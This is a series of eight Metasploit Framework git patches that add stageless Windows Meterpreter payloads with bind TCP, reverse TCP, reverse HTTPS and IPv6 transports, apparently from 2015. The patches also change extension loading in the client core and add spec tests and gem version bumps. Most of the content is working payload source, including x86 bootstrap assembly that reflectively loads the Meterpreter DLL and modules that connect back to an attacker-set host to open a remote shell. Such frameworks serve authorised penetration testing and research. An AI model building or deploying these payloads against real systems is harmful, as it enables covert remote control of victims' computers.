From 345b5cc8e171280383734dfac183f49b71f4935e Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 12 Mar 2015 09:45:09 +1000 Subject: [PATCH 1/8] Add stageless meterpreter support This commit adds plumbing which allows for the creation of stageless meterpreter payloads that include extensions. The included transprots at this point are bind_tcp, reverse_tcp and reverse_https, all x86. More coming for x64. Will also validate http soon. --- Gemfile.lock | 2 +- lib/msf/core/handler/reverse_http.rb | 2 +- .../payload/windows/stageless_meterpreter.rb | 106 ++++++++++++++++++ lib/rex/post/meterpreter/client_core.rb | 72 +++++++++--- .../singles/windows/meterpreter_bind_tcp.rb | 42 +++++++ .../windows/meterpreter_reverse_https.rb | 70 ++++++++++++ .../windows/meterpreter_reverse_tcp.rb | 41 +++++++ 7 files changed, 317 insertions(+), 18 deletions(-) create mode 100644 lib/msf/core/payload/windows/stageless_meterpreter.rb create mode 100644 modules/payloads/singles/windows/meterpreter_bind_tcp.rb create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_https.rb create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_tcp.rb diff --git a/Gemfile.lock b/Gemfile.lock index fa2547a62f..43070d2f35 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.14) + meterpreter_bins (= 0.0.15) msgpack nokogiri packetfu (= 1.1.9) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index b44ad8017b..9c6312f248 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -288,7 +288,7 @@ protected # Grab the checksummed version of CONN from the payload's request. conn_id = req.relative_resource.gsub("/", "") - print_status("Incoming orphaned session #{conn_id}, reattaching...") + print_status("Incoming orphaned or stageless session #{conn_id}, attaching...") # Short-circuit the payload's handle_connection processing for create_session create_session(cli, { diff --git a/lib/msf/core/payload/windows/stageless_meterpreter.rb b/lib/msf/core/payload/windows/stageless_meterpreter.rb new file mode 100644 index 0000000000..2e4ed3c6eb --- /dev/null +++ b/lib/msf/core/payload/windows/stageless_meterpreter.rb @@ -0,0 +1,106 @@ +#-*- coding: binary -*- + +require 'msf/core' + +module Msf + +## +# +# Implements stageless invocation of metsrv in x86 +# +## + +module Payload::Windows::StagelessMeterpreter + + include Msf::Payload::Windows + include Msf::Payload::Single + include Msf::ReflectiveDLLLoader + + def asm_invoke_metsrv(opts={}) + asm = %Q^ + ; prologue + dec ebp ; 'M' + pop edx ; 'Z' + call $+5 ; call next instruction + pop ebx ; get the current location (+7 bytes) + push edx ; restore edx + inc ebp ; restore ebp + push ebp ; save ebp for later + mov ebp, esp ; set up a new stack frame + ; Invoke ReflectiveLoader() + ; add the offset to ReflectiveLoader() (0x????????) + add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)} + call ebx ; invoke ReflectiveLoader() + ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) + ; offset from ReflectiveLoader() to the end of the DLL + add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])} + push ebx ; push the pointer to the extension list + push 4 ; indicate that we have attached + push eax ; push some arbitrary value for hInstance + mov ebx, eax ; save DllMain for another call + call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) + ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) + ; push the exitfunk value onto the stack + push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]} + push 5 ; indicate that we have detached + push eax ; push some arbitrary value for hInstance + call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) + ^ + + asm + end + + def generate_stageless_meterpreter(url = nil) + dll, offset = load_rdi_dll(MeterpreterBinaries.path('metsrv', 'x86.dll')) + + conf = { + :rdi_offset => offset, + :length => dll.length, + :exitfunk => datastore['EXITFUNC'] + } + + asm = asm_invoke_metsrv(conf) + + # generate the bootstrap asm + bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string + + # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry + if bootstrap.length > 62 + print_error("Stageless Meterpreter generated with oversized x86 bootstrap.") + return + end + + # patch the binary with all the stuff + dll[0, bootstrap.length] = bootstrap + + # the URL might not be given, as it might be patched in some other way + if url + url = "s#{url}\x00" + location = dll.index("https://#{'X' * 256}") + dll[location, url.length] = url + end + + # if a block is given then call that with the meterpreter dll + # so that custom patching can happen if required + yield dll if block_given? + + # append each extension to the payload, including + # the size of the extension + unless datastore['EXTENSIONS'].nil? + datastore['EXTENSIONS'].split(',').each do |e| + e = e.strip.downcase + ext, o = load_rdi_dll(MeterpreterBinaries.path("ext_server_#{e}", 'x86.dll')) + + # append the size, offset to RDI and the payload itself + dll << [ext.length].pack('V') + ext + end + end + + # Terminate the "list" of extensions + dll + [0].pack('V') + end + +end + +end + diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index ab67096026..542927e68e 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -40,6 +40,35 @@ class ClientCore < Extension # Core commands # ## + # + # + # Get a list of loaded commands for the given extension. + # + def get_loaded_extension_commands(extension_name) + request = Packet.create_request('core_enumextcmd') + request.add_tlv(TLV_TYPE_STRING, extension_name) + + response = self.client.send_packet_wait_response(request, self.client.response_timeout) + + # No response? + if response.nil? + raise RuntimeError, "No response was received to the core_enumextcmd request.", caller + elsif response.result == 50 + # This case happens when the target doesn't support the core_enumextcmd message. + # If this is the case, then we just want to ignore the error and return an empty + # list. This will force the caller to load any required modules. + return [] + elsif response.result != 0 + raise RuntimeError, "The core_enumextcmd request failed with result: #{response.result}.", caller + end + + commands = [] + response.each(TLV_TYPE_STRING) { |c| + commands << c.value + } + + commands + end # # Loads a library on the remote meterpreter instance. This method @@ -153,25 +182,36 @@ class ClientCore < Extension if mod.nil? raise RuntimeError, "No modules were specified", caller end - # Get us to the installation root and then into data/meterpreter, where - # the file is expected to be - modname = "ext_server_#{mod.downcase}" - path = MeterpreterBinaries.path(modname, client.binary_suffix) - if opts['ExtensionPath'] - path = ::File.expand_path(opts['ExtensionPath']) + # Query the remote instance to see if commands for the extension are + # already loaded + commands = get_loaded_extension_commands(mod.downcase) + + # if there are existing commands for the given extension, then we can use + # what's already there + unless commands.length > 0 + # Get us to the installation root and then into data/meterpreter, where + # the file is expected to be + modname = "ext_server_#{mod.downcase}" + path = MeterpreterBinaries.path(modname, client.binary_suffix) + + if opts['ExtensionPath'] + path = ::File.expand_path(opts['ExtensionPath']) + end + + if path.nil? + raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller + end + + # Load the extension DLL + commands = load_library( + 'LibraryFilePath' => path, + 'UploadLibrary' => true, + 'Extension' => true, + 'SaveToDisk' => opts['LoadFromDisk']) end - if path.nil? - raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller - end - - # Load the extension DLL - commands = load_library( - 'LibraryFilePath' => path, - 'UploadLibrary' => true, - 'Extension' => true, - 'SaveToDisk' => opts['LoadFromDisk']) + # wire the commands into the client client.add_extension(mod, commands) return true diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb new file mode 100644 index 0000000000..a61a54d766 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Bind TCP Inline', + 'Description' => 'Connect to victim and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + # blank LHOST indicates bind payload + url = "tcp://:#{datastore['LPORT']}" + generate_stageless_meterpreter(url) + end + +end + diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..fc94a96f1a --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_https' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse HTTPS Inline', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN) + rand = Rex::Text.rand_text_alphanumeric(16) + url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/" + + generate_stageless_meterpreter(url) do |dll| + + # TODO: figure out this bit + # patch the target ID into the URI if specified + #if opts[:target_id] + # i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00") + # if i + # t = opts[:target_id].to_s + # raise "Target ID must be less than 5 bytes" if t.length > 4 + # u = "/B#{t} HTTP/1.0\r\n\r\n\x00" + # print_status("Patching Target ID #{t} into DLL") + # dll[i, u.length] = u + # end + #end + + Rex::Payloads::Meterpreter::Patch.patch_passive_service! dll, + :url => url, + :ssl => true, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :ua => datastore['MeterpreterUserAgent'], + :proxyhost => datastore['PROXYHOST'], + :proxyport => datastore['PROXYPORT'], + :proxy_type => datastore['PROXY_TYPE'], + :proxy_username => datastore['PROXY_USERNAME'], + :proxy_password => datastore['PROXY_PASSWORD'] + end + end + +end + diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..a031f390c2 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -0,0 +1,41 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse TCP Inline', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + ], self.class) + end + + def generate + url = "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}" + generate_stageless_meterpreter(url) + end + +end + From c5a74c7db4fd7ea7cd109abbb57aa7ee6ff2a671 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 13 Mar 2015 20:14:54 +1000 Subject: [PATCH 2/8] Update the Meterpreter binaries version This will force the build/PR to be invalid until the new meterpreter binaries gem has been released. --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 43070d2f35..fa2547a62f 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.15) + meterpreter_bins (= 0.0.14) msgpack nokogiri packetfu (= 1.1.9) From 35cfdf051ac0b0a1700586b512b207b4ef63cf43 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 13 Mar 2015 20:15:31 +1000 Subject: [PATCH 3/8] Add support for meterpreter_reverse_ipv6_tcp New payload added, makes use of existing functionality. --- .../windows/meterpreter_reverse_ipv6_tcp.rb | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb new file mode 100644 index 0000000000..7dd5f24d64 --- /dev/null +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -0,0 +1,42 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/core/payload/windows/stageless_meterpreter' +require 'msf/base/sessions/meterpreter_x86_win' +require 'msf/base/sessions/meterpreter_options' + +module Metasploit3 + + include Msf::Payload::Windows::StagelessMeterpreter + include Msf::Sessions::MeterpreterOptions + + def initialize(info = {}) + + super(merge_info(info, + 'Name' => 'Windows Meterpreter Shell, Reverse TCP Inline (IPv6)', + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', + 'Author' => [ 'OJ Reeves' ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_x86_Win + )) + + register_options([ + OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]), + OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0]) + ], self.class) + end + + def generate + url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}" + generate_stageless_meterpreter(url) + end + +end + From 1338a55b0de8db68a7a727a59811b1412fe443f1 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 13 Mar 2015 21:49:45 +1000 Subject: [PATCH 4/8] Adjust error handling for extension enumeration Make the catch case more generic for when the target doesn't support the command for extension enumeration. This supports more than just windows now. --- lib/rex/post/meterpreter/client_core.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 542927e68e..7fa9a99315 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -53,13 +53,11 @@ class ClientCore < Extension # No response? if response.nil? raise RuntimeError, "No response was received to the core_enumextcmd request.", caller - elsif response.result == 50 + elsif response.result != 0 # This case happens when the target doesn't support the core_enumextcmd message. # If this is the case, then we just want to ignore the error and return an empty # list. This will force the caller to load any required modules. return [] - elsif response.result != 0 - raise RuntimeError, "The core_enumextcmd request failed with result: #{response.result}.", caller end commands = [] From 03232befc7a196b5eb613318a27d22a3a1c2dffd Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 16 Mar 2015 17:14:36 +1000 Subject: [PATCH 5/8] Add extra check to avoid crashing on startup --- lib/msf/core/payload/windows/stageless_meterpreter.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/stageless_meterpreter.rb b/lib/msf/core/payload/windows/stageless_meterpreter.rb index 2e4ed3c6eb..b9ddaf0dfd 100644 --- a/lib/msf/core/payload/windows/stageless_meterpreter.rb +++ b/lib/msf/core/payload/windows/stageless_meterpreter.rb @@ -77,7 +77,9 @@ module Payload::Windows::StagelessMeterpreter if url url = "s#{url}\x00" location = dll.index("https://#{'X' * 256}") - dll[location, url.length] = url + if location + dll[location, url.length] = url + end end # if a block is given then call that with the meterpreter dll From abb8a32e68a0b12a2f533acf86c4cb58a5c1d18a Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 16 Mar 2015 18:08:13 -0500 Subject: [PATCH 6/8] update spec for dynamic meterpreter payloads --- .../singles/windows/meterpreter_bind_tcp.rb | 2 + .../windows/meterpreter_reverse_https.rb | 2 + .../windows/meterpreter_reverse_ipv6_tcp.rb | 2 + .../windows/meterpreter_reverse_tcp.rb | 2 + spec/modules/payloads_spec.rb | 40 +++++++++++++++++++ 5 files changed, 48 insertions(+) diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index a61a54d766..ce5d27d27d 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index fc94a96f1a..827dc0a0ab 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 7dd5f24d64..4801a8e63a 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index a031f390c2..f0a4f30bdf 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -11,6 +11,8 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit3 + CachedSize = :dynamic + include Msf::Payload::Windows::StagelessMeterpreter include Msf::Sessions::MeterpreterOptions diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 698833c62a..432ff6aaf6 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2432,6 +2432,46 @@ describe 'modules/payloads', :content do reference_name: 'windows/messagebox' end + context 'windows/meterpreter_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_bind_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_bind_tcp' + end + + context 'windows/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_https' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_https' + end + + context 'windows/meterpreter_reverse_ipv6_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_ipv6_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_ipv6_tcp' + end + + context 'windows/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/windows/meterpreter_reverse_tcp' + ], + dynamic_size: true, + modules_pathname: modules_pathname, + reference_name: 'windows/meterpreter_reverse_tcp' + end + context 'windows/meterpreter/bind_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 349995a10931d5ae6611cf40212dc8f721d38a8c Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 16 Mar 2015 18:09:19 -0500 Subject: [PATCH 7/8] update gemspec for new meterpreter bins --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index fa2547a62f..6b20fd763c 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.14) + meterpreter_bins (= 0.0.15) msgpack nokogiri packetfu (= 1.1.9) @@ -132,7 +132,7 @@ GEM pg railties (< 4.0.0) recog (~> 1.0) - meterpreter_bins (0.0.14) + meterpreter_bins (0.0.15) method_source (0.8.2) mime-types (1.25.1) mini_portile (0.6.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 86331f4269..b9bc5a86c9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -64,7 +64,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 0.29.0' # Needed for Meterpreter on Windows, soon others. - spec.add_runtime_dependency 'meterpreter_bins', '0.0.14' + spec.add_runtime_dependency 'meterpreter_bins', '0.0.15' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # Needed by anemone crawler From 8ac032392b8da1e2ff572fb317685c13fbae75da Mon Sep 17 00:00:00 2001 From: OJ Date: Thu, 19 Mar 2015 14:51:03 +1000 Subject: [PATCH 8/8] Update meterpreter bins gem version --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6b20fd763c..aa5e42f9b6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -9,7 +9,7 @@ PATH json metasploit-concern (~> 0.3.0) metasploit-model (~> 0.29.0) - meterpreter_bins (= 0.0.15) + meterpreter_bins (= 0.0.16) msgpack nokogiri packetfu (= 1.1.9) @@ -132,7 +132,7 @@ GEM pg railties (< 4.0.0) recog (~> 1.0) - meterpreter_bins (0.0.15) + meterpreter_bins (0.0.16) method_source (0.8.2) mime-types (1.25.1) mini_portile (0.6.1) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b9bc5a86c9..09b425b894 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -64,7 +64,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '~> 0.29.0' # Needed for Meterpreter on Windows, soon others. - spec.add_runtime_dependency 'meterpreter_bins', '0.0.15' + spec.add_runtime_dependency 'meterpreter_bins', '0.0.16' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # Needed by anemone crawler